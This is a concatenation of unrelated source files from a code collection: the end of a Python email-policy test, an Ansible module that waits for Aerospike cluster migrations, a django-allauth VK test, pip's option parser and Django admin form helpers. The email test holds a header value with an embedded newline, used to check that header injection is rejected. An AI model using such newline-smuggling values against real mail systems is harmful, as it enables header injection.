policy2 = policy1.clone()
policy1.header_factory.map_to_type('foo', self.Foo)
h = policy1.header_factory('foo', 'test')
self.assertIsInstance(h, self.Foo)
h = policy2.header_factory('foo', 'test')
self.assertIsInstance(h, self.Foo)
def test_new_factory_overrides_default(self):
mypolicy = email.policy.EmailPolicy()
myfactory = mypolicy.header_factory
newpolicy = mypolicy + email.policy.strict
self.assertEqual(newpolicy.header_factory, myfactory)
newpolicy = email.policy.strict + mypolicy
self.assertEqual(newpolicy.header_factory, myfactory)
def test_adding_default_policies_preserves_default_factory(self):
newpolicy = email.policy.default + email.policy.strict
self.assertEqual(newpolicy.header_factory,
email.policy.EmailPolicy.header_factory)
self.assertEqual(newpolicy.__dict__, {'raise_on_defect': True})
# XXX: Need subclassing tests.
# For adding subclassed objects, make sure the usual rules apply (subclass
# wins), but that the order still works (right overrides left).
class TestPolicyPropagation(unittest.TestCase):
# The abstract methods are used by the parser but not by the wrapper
# functions that call it, so if the exception gets raised we know that the
# policy was actually propagated all the way to feedparser.
class MyPolicy(email.policy.Policy):
def badmethod(self, *args, **kw):
raise Exception("test")
fold = fold_binary = header_fetch_parser = badmethod
header_source_parse = header_store_parse = badmethod
def test_message_from_string(self):
with self.assertRaisesRegex(Exception, "^test$"):
email.message_from_string("Subject: test\n\n",
policy=self.MyPolicy)
def test_message_from_bytes(self):
with self.assertRaisesRegex(Exception, "^test$"):
email.message_from_bytes(b"Subject: test\n\n",
policy=self.MyPolicy)
def test_message_from_file(self):
f = io.StringIO('Subject: test\n\n')
with self.assertRaisesRegex(Exception, "^test$"):
email.message_from_file(f, policy=self.MyPolicy)
def test_message_from_binary_file(self):
f = io.BytesIO(b'Subject: test\n\n')
with self.assertRaisesRegex(Exception, "^test$"):
email.message_from_binary_file(f, policy=self.MyPolicy)
# These are redundant, but we need them for black-box completeness.
def test_parser(self):
p = email.parser.Parser(policy=self.MyPolicy)
with self.assertRaisesRegex(Exception, "^test$"):
p.parsestr('Subject: test\n\n')
def test_bytes_parser(self):
p = email.parser.BytesParser(policy=self.MyPolicy)
with self.assertRaisesRegex(Exception, "^test$"):
p.parsebytes(b'Subject: test\n\n')
# Now that we've established that all the parse methods get the
# policy in to feedparser, we can use message_from_string for
# the rest of the propagation tests.
def _make_msg(self, source='Subject: test\n\n', policy=None):
self.policy = email.policy.default.clone() if policy is None else policy
return email.message_from_string(source, policy=self.policy)
def test_parser_propagates_policy_to_message(self):
msg = self._make_msg()
self.assertIs(msg.policy, self.policy)
def test_parser_propagates_policy_to_sub_messages(self):
msg = self._make_msg(textwrap.dedent("""\
Subject: mime test
MIME-Version: 1.0
Content-Type: multipart/mixed, boundary="XXX"
--XXX
Content-Type: text/plain
test
--XXX
Content-Type: text/plain
test2
--XXX--
"""))
for part in msg.walk():
self.assertIs(part.policy, self.policy)
def test_message_policy_propagates_to_generator(self):
msg = self._make_msg("Subject: test\nTo: foo\n\n",
policy=email.policy.default.clone(linesep='X'))
s = io.StringIO()
g = email.generator.Generator(s)
g.flatten(msg)
self.assertEqual(s.getvalue(), "Subject: testXTo: fooXX")
def test_message_policy_used_by_as_string(self):
msg = self._make_msg("Subject: test\nTo: foo\n\n",
policy=email.policy.default.clone(linesep='X'))
self.assertEqual(msg.as_string(), "Subject: testXTo: fooXX")
class TestConcretePolicies(unittest.TestCase):
def test_header_store_parse_rejects_newlines(self):
instance = email.policy.EmailPolicy()
self.assertRaises(ValueError,
instance.header_store_parse,
'From', 'spam\[email protected]')
if __name__ == '__main__':
unittest.main()
| lgpl-3.0 | -7,406,632,348,161,437,000 | 39.412651 | 80 | 0.606246 | false |
drawks/ansible | lib/ansible/modules/database/aerospike/aerospike_migrations.py | 25 | 18758 | #!/usr/bin/python
"""short_description: Check or wait for migrations between nodes"""
# Copyright: (c) 2018, Albert Autin
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: aerospike_migrations
short_description: Check or wait for migrations between nodes
description:
- This can be used to check for migrations in a cluster.
This makes it easy to do a rolling upgrade/update on Aerospike nodes.
- If waiting for migrations is not desired, simply just poll until
port 3000 if available or asinfo -v status returns ok
version_added: 2.8
author: "Albert Autin (@Alb0t)"
options:
host:
description:
- Which host do we use as seed for info connection
required: False
type: str
default: localhost
port:
description:
- Which port to connect to Aerospike on (service port)
required: False
type: int
default: 3000
connect_timeout:
description:
- How long to try to connect before giving up (milliseconds)
required: False
type: int
default: 1000
consecutive_good_checks:
description:
- How many times should the cluster report "no migrations"
consecutively before returning OK back to ansible?
required: False
type: int
default: 3
sleep_between_checks:
description:
- How long to sleep between each check (seconds).
required: False
type: int
default: 60
tries_limit:
description:
- How many times do we poll before giving up and failing?
default: 300
required: False
type: int
local_only:
description:
- Do you wish to only check for migrations on the local node
before returning, or do you want all nodes in the cluster
to finish before returning?
required: True
type: bool
min_cluster_size:
description:
- Check will return bad until cluster size is met
or until tries is exhausted
required: False
type: int
default: 1
fail_on_cluster_change:
description:
- Fail if the cluster key changes
if something else is changing the cluster, we may want to fail
required: False
type: bool
default: True
migrate_tx_key:
description:
- The metric key used to determine if we have tx migrations
remaining. Changeable due to backwards compatibility.
required: False
type: str
default: migrate_tx_partitions_remaining
migrate_rx_key:
description:
- The metric key used to determine if we have rx migrations
remaining. Changeable due to backwards compatibility.
required: False
type: str
default: migrate_rx_partitions_remaining
target_cluster_size:
description:
- When all aerospike builds in the cluster are greater than
version 4.3, then the C(cluster-stable) info command will be used.
Inside this command, you can optionally specify what the target
cluster size is - but it is not necessary. You can still rely on
min_cluster_size if you don't want to use this option.
- If this option is specified on a cluster that has at least 1
host <4.3 then it will be ignored until the min version reaches
4.3.
required: False
type: int
'''
EXAMPLES = '''
# check for migrations on local node
- name: wait for migrations on local node before proceeding
aerospike_migrations:
host: "localhost"
connect_timeout: 2000
consecutive_good_checks: 5
sleep_between_checks: 15
tries_limit: 600
local_only: False
# example playbook:
---
- name: upgrade aerospike
hosts: all
become: true
serial: 1
tasks:
- name: Install dependencies
apt:
name:
- python
- python-pip
- python-setuptools
state: latest
- name: setup aerospike
pip:
name: aerospike
# check for migrations every (sleep_between_checks)
# If at least (consecutive_good_checks) checks come back OK in a row, then return OK.
# Will exit if any exception, which can be caused by bad nodes,
# nodes not returning data, or other reasons.
# Maximum runtime before giving up in this case will be:
# Tries Limit * Sleep Between Checks * delay * retries
- name: wait for aerospike migrations
aerospike_migrations:
local_only: True
sleep_between_checks: 1
tries_limit: 5
consecutive_good_checks: 3
fail_on_cluster_change: true
min_cluster_size: 3
target_cluster_size: 4
register: migrations_check
until: migrations_check is succeeded
changed_when: false
delay: 60
retries: 120
- name: another thing
shell: |
echo foo
- name: reboot
reboot:
'''
RETURN = '''
# Returns only a success/failure result. Changed is always false.
'''
import traceback
from ansible.module_utils.basic import AnsibleModule, missing_required_lib
LIB_FOUND_ERR = None
try:
import aerospike
from time import sleep
import re
except ImportError as ie:
LIB_FOUND = False
LIB_FOUND_ERR = traceback.format_exc()
else:
LIB_FOUND = True
def run_module():
"""run ansible module"""
module_args = dict(
host=dict(type='str', required=False, default='localhost'),
port=dict(type='int', required=False, default=3000),
connect_timeout=dict(type='int', required=False, default=1000),
consecutive_good_checks=dict(type='int', required=False, default=3),
sleep_between_checks=dict(type='int', required=False, default=60),
tries_limit=dict(type='int', requires=False, default=300),
local_only=dict(type='bool', required=True),
min_cluster_size=dict(type='int', required=False, default=1),
target_cluster_size=dict(type='int', required=False, default=None),
fail_on_cluster_change=dict(type='bool', required=False, default=True),
migrate_tx_key=dict(type='str', required=False,
default="migrate_tx_partitions_remaining"),
migrate_rx_key=dict(type='str', required=False,
default="migrate_rx_partitions_remaining")
)
result = dict(
changed=False,
)
module = AnsibleModule(
argument_spec=module_args,
supports_check_mode=True
)
if not LIB_FOUND:
module.fail_json(msg=missing_required_lib('aerospike'),
exception=LIB_FOUND_ERR)
try:
if module.check_mode:
has_migrations, skip_reason = False, None
else:
migrations = Migrations(module)
has_migrations, skip_reason = migrations.has_migs(
module.params['local_only']
)
if has_migrations:
module.fail_json(msg="Failed.", skip_reason=skip_reason)
except Exception as e:
module.fail_json(msg="Error: {0}".format(e))
module.exit_json(**result)
class Migrations:
""" Check or wait for migrations between nodes """
def __init__(self, module):
self.module = module
self._client = self._create_client().connect()
self._nodes = {}
self._update_nodes_list()
self._cluster_statistics = {}
self._update_cluster_statistics()
self._namespaces = set()
self._update_cluster_namespace_list()
self._build_list = set()
self._update_build_list()
self._start_cluster_key = \
self._cluster_statistics[self._nodes[0]]['cluster_key']
def _create_client(self):
""" TODO: add support for auth, tls, and other special features
I won't use those features, so I'll wait until somebody complains
or does it for me (Cross fingers)
create the client object"""
config = {
'hosts': [
(self.module.params['host'], self.module.params['port'])
],
'policies': {
'timeout': self.module.params['connect_timeout']
}
}
return aerospike.client(config)
def _info_cmd_helper(self, cmd, node=None, delimiter=';'):
"""delimiter is for seperate stats that come back, NOT for kv
separation which is ="""
if node is None: # If no node passed, use the first one (local)
node = self._nodes[0]
data = self._client.info_node(cmd, node)
data = data.split("\t")
if len(data) != 1 and len(data) != 2:
self.module.fail_json(
msg="Unexpected number of values returned in info command: " +
str(len(data))
)
# data will be in format 'command\touput'
data = data[-1]
data = data.rstrip("\n\r")
data_arr = data.split(delimiter)
# some commands don't return in kv format
# so we dont want a dict from those.
if '=' in data:
retval = dict(
metric.split("=", 1) for metric in data_arr
)
else:
# if only 1 element found, and not kv, return just the value.
if len(data_arr) == 1:
retval = data_arr[0]
else:
retval = data_arr
return retval
def _update_build_list(self):
"""creates self._build_list which is a unique list
of build versions."""
self._build_list = set()
for node in self._nodes:
build = self._info_cmd_helper('build', node)
self._build_list.add(build)
# just checks to see if the version is 4.3 or greater
def _can_use_cluster_stable(self):
# if version <4.3 we can't use cluster-stable info cmd
# regex hack to check for versions beginning with 0-3 or
# beginning with 4.0,4.1,4.2
if re.search(R'^([0-3]\.|4\.[0-2])', min(self._build_list)):
return False
return True
def _update_cluster_namespace_list(self):
""" make a unique list of namespaces
TODO: does this work on a rolling namespace add/deletion?
thankfully if it doesnt, we dont need this on builds >=4.3"""
self._namespaces = set()
for node in self._nodes:
namespaces = self._info_cmd_helper('namespaces', node)
for namespace in namespaces:
self._namespaces.add(namespace)
def _update_cluster_statistics(self):
"""create a dict of nodes with their related stats """
self._cluster_statistics = {}
for node in self._nodes:
self._cluster_statistics[node] = \
self._info_cmd_helper('statistics', node)
def _update_nodes_list(self):
"""get a fresh list of all the nodes"""
self._nodes = self._client.get_nodes()
if not self._nodes:
self.module.fail_json("Failed to retrieve at least 1 node.")
def _namespace_has_migs(self, namespace, node=None):
"""returns a True or False.
Does the namespace have migrations for the node passed?
If no node passed, uses the local node or the first one in the list"""
namespace_stats = self._info_cmd_helper("namespace/" + namespace, node)
try:
namespace_tx = \
int(namespace_stats[self.module.params['migrate_tx_key']])
namespace_rx = \
int(namespace_stats[self.module.params['migrate_tx_key']])
except KeyError:
self.module.fail_json(
msg="Did not find partition remaining key:" +
self.module.params['migrate_tx_key'] +
" or key:" +
self.module.params['migrate_rx_key'] +
" in 'namespace/" +
namespace +
"' output."
)
except TypeError:
self.module.fail_json(
msg="namespace stat returned was not numerical"
)
return namespace_tx != 0 or namespace_rx != 0
def _node_has_migs(self, node=None):
"""just calls namespace_has_migs and
if any namespace has migs returns true"""
migs = 0
self._update_cluster_namespace_list()
for namespace in self._namespaces:
if self._namespace_has_migs(namespace, node):
migs += 1
return migs != 0
def _cluster_key_consistent(self):
"""create a dictionary to store what each node
returns the cluster key as. we should end up with only 1 dict key,
with the key being the cluster key."""
cluster_keys = {}
for node in self._nodes:
cluster_key = self._cluster_statistics[node][
'cluster_key']
if cluster_key not in cluster_keys:
cluster_keys[cluster_key] = 1
else:
cluster_keys[cluster_key] += 1
if len(cluster_keys.keys()) == 1 and \
self._start_cluster_key in cluster_keys:
return True
return False
def _cluster_migrates_allowed(self):
"""ensure all nodes have 'migrate_allowed' in their stats output"""
for node in self._nodes:
node_stats = self._info_cmd_helper('statistics', node)
allowed = node_stats['migrate_allowed']
if allowed == "false":
return False
return True
def _cluster_has_migs(self):
"""calls node_has_migs for each node"""
migs = 0
for node in self._nodes:
if self._node_has_migs(node):
migs += 1
if migs == 0:
return False
return True
def _has_migs(self, local):
if local:
return self._local_node_has_migs()
return self._cluster_has_migs()
def _local_node_has_migs(self):
return self._node_has_migs(None)
def _is_min_cluster_size(self):
"""checks that all nodes in the cluster are returning the
mininimum cluster size specified in their statistics output"""
sizes = set()
for node in self._cluster_statistics:
sizes.add(int(self._cluster_statistics[node]['cluster_size']))
if (len(sizes)) > 1: # if we are getting more than 1 size, lets say no
return False
if (min(sizes)) >= self.module.params['min_cluster_size']:
return True
return False
def _cluster_stable(self):
"""Added 4.3:
cluster-stable:size=<target-cluster-size>;ignore-migrations=<yes/no>;namespace=<namespace-name>
Returns the current 'cluster_key' when the following are satisfied:
If 'size' is specified then the target node's 'cluster-size'
must match size.
If 'ignore-migrations' is either unspecified or 'false' then
the target node's migrations counts must be zero for the provided
'namespace' or all namespaces if 'namespace' is not provided."""
cluster_key = set()
cluster_key.add(self._info_cmd_helper('statistics')['cluster_key'])
cmd = "cluster-stable:"
target_cluster_size = self.module.params['target_cluster_size']
if target_cluster_size is not None:
cmd = cmd + "size=" + str(target_cluster_size) + ";"
for node in self._nodes:
cluster_key.add(self._info_cmd_helper(cmd, node))
if len(cluster_key) == 1:
return True
return False
def _cluster_good_state(self):
"""checks a few things to make sure we're OK to say the cluster
has no migs. It could be in a unhealthy condition that does not allow
migs, or a split brain"""
if self._cluster_key_consistent() is not True:
return False, "Cluster key inconsistent."
if self._is_min_cluster_size() is not True:
return False, "Cluster min size not reached."
if self._cluster_migrates_allowed() is not True:
return False, "migrate_allowed is false somewhere."
return True, "OK."
def has_migs(self, local=True):
"""returns a boolean, False if no migrations otherwise True"""
consecutive_good = 0
try_num = 0
skip_reason = list()
while \
try_num < int(self.module.params['tries_limit']) and \
consecutive_good < \
int(self.module.params['consecutive_good_checks']):
self._update_nodes_list()
self._update_cluster_statistics()
# These checks are outside of the while loop because
# we probably want to skip & sleep instead of failing entirely
stable, reason = self._cluster_good_state()
if stable is not True:
skip_reason.append(
"Skipping on try#" + str(try_num) +
" for reason:" + reason
)
else:
if self._can_use_cluster_stable():
if self._cluster_stable():
consecutive_good += 1
else:
consecutive_good = 0
skip_reason.append(
"Skipping on try#" + str(try_num) +
" for reason:" + " cluster_stable"
)
elif self._has_migs(local):
# print("_has_migs")
skip_reason.append(
"Skipping on try#" + str(try_num) +
" for reason:" + " migrations"
)
consecutive_good = 0
else:
consecutive_good += 1
if consecutive_good == self.module.params[
'consecutive_good_checks']:
break
try_num += 1
sleep(self.module.params['sleep_between_checks'])
# print(skip_reason)
if consecutive_good == self.module.params['consecutive_good_checks']:
return False, None
return True, skip_reason
def main():
"""main method for ansible module"""
run_module()
if __name__ == '__main__':
main()
| gpl-3.0 | -1,620,266,335,480,614,400 | 34.866157 | 103 | 0.574848 | false |
beswarm/django-allauth | allauth/socialaccount/providers/vk/tests.py | 71 | 1253 | from __future__ import absolute_import
from allauth.socialaccount.tests import create_oauth2_tests
from allauth.socialaccount.providers import registry
from allauth.tests import MockedResponse
from .provider import VKProvider
class VKTests(create_oauth2_tests(registry.by_id(VKProvider.id))):
def get_mocked_response(self, verified_email=True):
return MockedResponse(200, """
{"response": [{"last_name": "Penners", "university_name": "", "photo": "http://vk.com/images/camera_c.gif", "sex": 2, "photo_medium": "http://vk.com/images/camera_b.gif", "relation": "0", "timezone": 1, "photo_big": "http://vk.com/images/camera_a.gif", "uid": 219004864, "universities": [], "city": "1430", "first_name": "Raymond", "faculty_name": "", "online": 1, "counters": {"videos": 0, "online_friends": 0, "notes": 0, "audios": 0, "photos": 0, "followers": 0, "groups": 0, "user_videos": 0, "albums": 0, "friends": 0}, "home_phone": "", "faculty": 0, "nickname": "", "screen_name": "id219004864", "has_mobile": 1, "country": "139", "university": 0, "graduation": 0, "activity": "", "last_seen": {"time": 1377805189}}]}
""")
def get_login_response_json(self, with_refresh_token=True):
return '{"user_id": 219004864, "access_token":"testac"}'
| mit | -3,557,980,755,823,644,000 | 68.611111 | 724 | 0.661612 | false |
grivescorbett/heroku-buildpack-python | vendor/pip-pop/pip/baseparser.py | 424 | 10465 | """Base option parser setup"""
from __future__ import absolute_import
import sys
import optparse
import os
import re
import textwrap
from distutils.util import strtobool
from pip._vendor.six import string_types
from pip._vendor.six.moves import configparser
from pip.locations import (
legacy_config_file, config_basename, running_under_virtualenv,
site_config_files
)
from pip.utils import appdirs, get_terminal_size
_environ_prefix_re = re.compile(r"^PIP_", re.I)
class PrettyHelpFormatter(optparse.IndentedHelpFormatter):
"""A prettier/less verbose help formatter for optparse."""
def __init__(self, *args, **kwargs):
# help position must be aligned with __init__.parseopts.description
kwargs['max_help_position'] = 30
kwargs['indent_increment'] = 1
kwargs['width'] = get_terminal_size()[0] - 2
optparse.IndentedHelpFormatter.__init__(self, *args, **kwargs)
def format_option_strings(self, option):
return self._format_option_strings(option, ' <%s>', ', ')
def _format_option_strings(self, option, mvarfmt=' <%s>', optsep=', '):
"""
Return a comma-separated list of option strings and metavars.
:param option: tuple of (short opt, long opt), e.g: ('-f', '--format')
:param mvarfmt: metavar format string - evaluated as mvarfmt % metavar
:param optsep: separator
"""
opts = []
if option._short_opts:
opts.append(option._short_opts[0])
if option._long_opts:
opts.append(option._long_opts[0])
if len(opts) > 1:
opts.insert(1, optsep)
if option.takes_value():
metavar = option.metavar or option.dest.lower()
opts.append(mvarfmt % metavar.lower())
return ''.join(opts)
def format_heading(self, heading):
if heading == 'Options':
return ''
return heading + ':\n'
def format_usage(self, usage):
"""
Ensure there is only one newline between usage and the first heading
if there is no description.
"""
msg = '\nUsage: %s\n' % self.indent_lines(textwrap.dedent(usage), " ")
return msg
def format_description(self, description):
# leave full control over description to us
if description:
if hasattr(self.parser, 'main'):
label = 'Commands'
else:
label = 'Description'
# some doc strings have initial newlines, some don't
description = description.lstrip('\n')
# some doc strings have final newlines and spaces, some don't
description = description.rstrip()
# dedent, then reindent
description = self.indent_lines(textwrap.dedent(description), " ")
description = '%s:\n%s\n' % (label, description)
return description
else:
return ''
def format_epilog(self, epilog):
# leave full control over epilog to us
if epilog:
return epilog
else:
return ''
def indent_lines(self, text, indent):
new_lines = [indent + line for line in text.split('\n')]
return "\n".join(new_lines)
class UpdatingDefaultsHelpFormatter(PrettyHelpFormatter):
"""Custom help formatter for use in ConfigOptionParser.
This is updates the defaults before expanding them, allowing
them to show up correctly in the help listing.
"""
def expand_default(self, option):
if self.parser is not None:
self.parser._update_defaults(self.parser.defaults)
return optparse.IndentedHelpFormatter.expand_default(self, option)
class CustomOptionParser(optparse.OptionParser):
def insert_option_group(self, idx, *args, **kwargs):
"""Insert an OptionGroup at a given position."""
group = self.add_option_group(*args, **kwargs)
self.option_groups.pop()
self.option_groups.insert(idx, group)
return group
@property
def option_list_all(self):
"""Get a list of all options, including those in option groups."""
res = self.option_list[:]
for i in self.option_groups:
res.extend(i.option_list)
return res
class ConfigOptionParser(CustomOptionParser):
"""Custom option parser which updates its defaults by checking the
configuration files and environmental variables"""
isolated = False
def __init__(self, *args, **kwargs):
self.config = configparser.RawConfigParser()
self.name = kwargs.pop('name')
self.isolated = kwargs.pop("isolated", False)
self.files = self.get_config_files()
if self.files:
self.config.read(self.files)
assert self.name
optparse.OptionParser.__init__(self, *args, **kwargs)
def get_config_files(self):
# the files returned by this method will be parsed in order with the
# first files listed being overridden by later files in standard
# ConfigParser fashion
config_file = os.environ.get('PIP_CONFIG_FILE', False)
if config_file == os.devnull:
return []
# at the base we have any site-wide configuration
files = list(site_config_files)
# per-user configuration next
if not self.isolated:
if config_file and os.path.exists(config_file):
files.append(config_file)
else:
# This is the legacy config file, we consider it to be a lower
# priority than the new file location.
files.append(legacy_config_file)
# This is the new config file, we consider it to be a higher
# priority than the legacy file.
files.append(
os.path.join(
appdirs.user_config_dir("pip"),
config_basename,
)
)
# finally virtualenv configuration first trumping others
if running_under_virtualenv():
venv_config_file = os.path.join(
sys.prefix,
config_basename,
)
if os.path.exists(venv_config_file):
files.append(venv_config_file)
return files
def check_default(self, option, key, val):
try:
return option.check_value(key, val)
except optparse.OptionValueError as exc:
print("An error occurred during configuration: %s" % exc)
sys.exit(3)
def _update_defaults(self, defaults):
"""Updates the given defaults with values from the config files and
the environ. Does a little special handling for certain types of
options (lists)."""
# Then go and look for the other sources of configuration:
config = {}
# 1. config files
for section in ('global', self.name):
config.update(
self.normalize_keys(self.get_config_section(section))
)
# 2. environmental variables
if not self.isolated:
config.update(self.normalize_keys(self.get_environ_vars()))
# Accumulate complex default state.
self.values = optparse.Values(self.defaults)
late_eval = set()
# Then set the options with those values
for key, val in config.items():
# ignore empty values
if not val:
continue
option = self.get_option(key)
# Ignore options not present in this parser. E.g. non-globals put
# in [global] by users that want them to apply to all applicable
# commands.
if option is None:
continue
if option.action in ('store_true', 'store_false', 'count'):
val = strtobool(val)
elif option.action == 'append':
val = val.split()
val = [self.check_default(option, key, v) for v in val]
elif option.action == 'callback':
late_eval.add(option.dest)
opt_str = option.get_opt_string()
val = option.convert_value(opt_str, val)
# From take_action
args = option.callback_args or ()
kwargs = option.callback_kwargs or {}
option.callback(option, opt_str, val, self, *args, **kwargs)
else:
val = self.check_default(option, key, val)
defaults[option.dest] = val
for key in late_eval:
defaults[key] = getattr(self.values, key)
self.values = None
return defaults
def normalize_keys(self, items):
"""Return a config dictionary with normalized keys regardless of
whether the keys were specified in environment variables or in config
files"""
normalized = {}
for key, val in items:
key = key.replace('_', '-')
if not key.startswith('--'):
key = '--%s' % key # only prefer long opts
normalized[key] = val
return normalized
def get_config_section(self, name):
"""Get a section of a configuration"""
if self.config.has_section(name):
return self.config.items(name)
return []
def get_environ_vars(self):
"""Returns a generator with all environmental vars with prefix PIP_"""
for key, val in os.environ.items():
if _environ_prefix_re.search(key):
yield (_environ_prefix_re.sub("", key).lower(), val)
def get_default_values(self):
"""Overridding to make updating the defaults after instantiation of
the option parser possible, _update_defaults() does the dirty work."""
if not self.process_default_values:
# Old, pre-Optik 1.5 behaviour.
return optparse.Values(self.defaults)
defaults = self._update_defaults(self.defaults.copy()) # ours
for option in self._get_all_options():
default = defaults.get(option.dest)
if isinstance(default, string_types):
opt_str = option.get_opt_string()
defaults[option.dest] = option.check_value(opt_str, default)
return optparse.Values(defaults)
def error(self, msg):
self.print_usage(sys.stderr)
self.exit(2, "%s\n" % msg)
| mit | 2,216,669,898,507,339,300 | 34.839041 | 79 | 0.587291 | false |
robovm/robovm-studio | python/lib/Lib/site-packages/django/contrib/admin/helpers.py | 78 | 13324 | from django import forms
from django.conf import settings
from django.contrib.admin.util import flatten_fieldsets, lookup_field
from django.contrib.admin.util import display_for_field, label_for_field
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ObjectDoesNotExist
from django.db.models.fields.related import ManyToManyRel
from django.forms.util import flatatt
from django.template.defaultfilters import capfirst
from django.utils.encoding import force_unicode, smart_unicode
from django.utils.html import escape, conditional_escape
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _
ACTION_CHECKBOX_NAME = '_selected_action'
class ActionForm(forms.Form):
action = forms.ChoiceField(label=_('Action:'))
select_across = forms.BooleanField(label='', required=False, initial=0,
widget=forms.HiddenInput({'class': 'select-across'}))
checkbox = forms.CheckboxInput({'class': 'action-select'}, lambda value: False)
class AdminForm(object):
def __init__(self, form, fieldsets, prepopulated_fields, readonly_fields=None, model_admin=None):
self.form, self.fieldsets = form, normalize_fieldsets(fieldsets)
self.prepopulated_fields = [{
'field': form[field_name],
'dependencies': [form[f] for f in dependencies]
} for field_name, dependencies in prepopulated_fields.items()]
self.model_admin = model_admin
if readonly_fields is None:
readonly_fields = ()
self.readonly_fields = readonly_fields
def __iter__(self):
for name, options in self.fieldsets:
yield Fieldset(self.form, name,
readonly_fields=self.readonly_fields,
model_admin=self.model_admin,
**options
)
def first_field(self):
try:
fieldset_name, fieldset_options = self.fieldsets[0]
field_name = fieldset_options['fields'][0]
if not isinstance(field_name, basestring):
field_name = field_name[0]
return self.form[field_name]
except (KeyError, IndexError):
pass
try:
return iter(self.form).next()
except StopIteration:
return None
def _media(self):
media = self.form.media
for fs in self:
media = media + fs.media
return media
media = property(_media)
class Fieldset(object):
def __init__(self, form, name=None, readonly_fields=(), fields=(), classes=(),
description=None, model_admin=None):
self.form = form
self.name, self.fields = name, fields
self.classes = u' '.join(classes)
self.description = description
self.model_admin = model_admin
self.readonly_fields = readonly_fields
def _media(self):
if 'collapse' in self.classes:
js = ['js/jquery.min.js', 'js/jquery.init.js', 'js/collapse.min.js']
return forms.Media(js=['%s%s' % (settings.ADMIN_MEDIA_PREFIX, url) for url in js])
return forms.Media()
media = property(_media)
def __iter__(self):
for field in self.fields:
yield Fieldline(self.form, field, self.readonly_fields, model_admin=self.model_admin)
class Fieldline(object):
def __init__(self, form, field, readonly_fields=None, model_admin=None):
self.form = form # A django.forms.Form instance
if not hasattr(field, "__iter__"):
self.fields = [field]
else:
self.fields = field
self.model_admin = model_admin
if readonly_fields is None:
readonly_fields = ()
self.readonly_fields = readonly_fields
def __iter__(self):
for i, field in enumerate(self.fields):
if field in self.readonly_fields:
yield AdminReadonlyField(self.form, field, is_first=(i == 0),
model_admin=self.model_admin)
else:
yield AdminField(self.form, field, is_first=(i == 0))
def errors(self):
return mark_safe(u'\n'.join([self.form[f].errors.as_ul() for f in self.fields if f not in self.readonly_fields]).strip('\n'))
class AdminField(object):
def __init__(self, form, field, is_first):
self.field = form[field] # A django.forms.BoundField instance
self.is_first = is_first # Whether this field is first on the line
self.is_checkbox = isinstance(self.field.field.widget, forms.CheckboxInput)
def label_tag(self):
classes = []
if self.is_checkbox:
classes.append(u'vCheckboxLabel')
contents = force_unicode(escape(self.field.label))
else:
contents = force_unicode(escape(self.field.label)) + u':'
if self.field.field.required:
classes.append(u'required')
if not self.is_first:
classes.append(u'inline')
attrs = classes and {'class': u' '.join(classes)} or {}
return self.field.label_tag(contents=contents, attrs=attrs)
def errors(self):
return mark_safe(self.field.errors.as_ul())
class AdminReadonlyField(object):
def __init__(self, form, field, is_first, model_admin=None):
label = label_for_field(field, form._meta.model, model_admin)
# Make self.field look a little bit like a field. This means that
# {{ field.name }} must be a useful class name to identify the field.
# For convenience, store other field-related data here too.
if callable(field):
class_name = field.__name__ != '<lambda>' and field.__name__ or ''
else:
class_name = field
self.field = {
'name': class_name,
'label': label,
'field': field,
}
self.form = form
self.model_admin = model_admin
self.is_first = is_first
self.is_checkbox = False
self.is_readonly = True
def label_tag(self):
attrs = {}
if not self.is_first:
attrs["class"] = "inline"
label = self.field['label']
contents = capfirst(force_unicode(escape(label))) + u":"
return mark_safe('<label%(attrs)s>%(contents)s</label>' % {
"attrs": flatatt(attrs),
"contents": contents,
})
def contents(self):
from django.contrib.admin.templatetags.admin_list import _boolean_icon
from django.contrib.admin.views.main import EMPTY_CHANGELIST_VALUE
field, obj, model_admin = self.field['field'], self.form.instance, self.model_admin
try:
f, attr, value = lookup_field(field, obj, model_admin)
except (AttributeError, ValueError, ObjectDoesNotExist):
result_repr = EMPTY_CHANGELIST_VALUE
else:
if f is None:
boolean = getattr(attr, "boolean", False)
if boolean:
result_repr = _boolean_icon(value)
else:
result_repr = smart_unicode(value)
if getattr(attr, "allow_tags", False):
result_repr = mark_safe(result_repr)
else:
if value is None:
result_repr = EMPTY_CHANGELIST_VALUE
elif isinstance(f.rel, ManyToManyRel):
result_repr = ", ".join(map(unicode, value.all()))
else:
result_repr = display_for_field(value, f)
return conditional_escape(result_repr)
class InlineAdminFormSet(object):
"""
A wrapper around an inline formset for use in the admin system.
"""
def __init__(self, inline, formset, fieldsets, readonly_fields=None, model_admin=None):
self.opts = inline
self.formset = formset
self.fieldsets = fieldsets
self.model_admin = model_admin
if readonly_fields is None:
readonly_fields = ()
self.readonly_fields = readonly_fields
def __iter__(self):
for form, original in zip(self.formset.initial_forms, self.formset.get_queryset()):
yield InlineAdminForm(self.formset, form, self.fieldsets,
self.opts.prepopulated_fields, original, self.readonly_fields,
model_admin=self.model_admin)
for form in self.formset.extra_forms:
yield InlineAdminForm(self.formset, form, self.fieldsets,
self.opts.prepopulated_fields, None, self.readonly_fields,
model_admin=self.model_admin)
yield InlineAdminForm(self.formset, self.formset.empty_form,
self.fieldsets, self.opts.prepopulated_fields, None,
self.readonly_fields, model_admin=self.model_admin)
def fields(self):
fk = getattr(self.formset, "fk", None)
for i, field in enumerate(flatten_fieldsets(self.fieldsets)):
if fk and fk.name == field:
continue
if field in self.readonly_fields:
yield {
'label': label_for_field(field, self.opts.model, self.model_admin),
'widget': {
'is_hidden': False
},
'required': False
}
else:
yield self.formset.form.base_fields[field]
def _media(self):
media = self.opts.media + self.formset.media
for fs in self:
media = media + fs.media
return media
media = property(_media)
class InlineAdminForm(AdminForm):
"""
A wrapper around an inline form for use in the admin system.
"""
def __init__(self, formset, form, fieldsets, prepopulated_fields, original,
readonly_fields=None, model_admin=None):
self.formset = formset
self.model_admin = model_admin
self.original = original
if original is not None:
self.original_content_type_id = ContentType.objects.get_for_model(original).pk
self.show_url = original and hasattr(original, 'get_absolute_url')
super(InlineAdminForm, self).__init__(form, fieldsets, prepopulated_fields,
readonly_fields, model_admin)
def __iter__(self):
for name, options in self.fieldsets:
yield InlineFieldset(self.formset, self.form, name,
self.readonly_fields, model_admin=self.model_admin, **options)
